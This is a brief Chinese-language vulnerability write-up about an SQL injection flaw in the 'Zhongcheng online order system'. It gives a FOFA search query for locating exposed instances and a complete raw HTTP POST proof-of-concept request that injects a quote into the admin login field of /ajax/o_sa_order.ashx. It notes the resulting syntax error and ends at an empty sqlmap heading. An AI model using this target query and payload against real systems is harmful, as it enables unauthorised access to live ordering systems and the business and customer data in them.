漏洞描述:
与传统订货方式相比,首先网络订货打破了时间和空间的限制,客户可以在订货周期内的任意时间和任何地点,通过网上订货网站自主选择品牌,提报订货需求,完成订购业务。众诚网上订单系统存在SQL注入漏洞
FOFA:title="欢迎使用众诚网上订单系统"
漏洞复现:
POC:
POST /ajax/o_sa_order.ashx HTTP/1.1
Host:
Content-Length: 42
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/login.htm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASPSESSIONIDCCDSBQSQ=HJGLDGEAPAHNMJLCFFEMPOFL; __session:0.28302654601560717:=http:
Connection: keep-alive
type=login&user_id=admin'&user_pwd=1111111
bp返回包语法错误
sqlmap: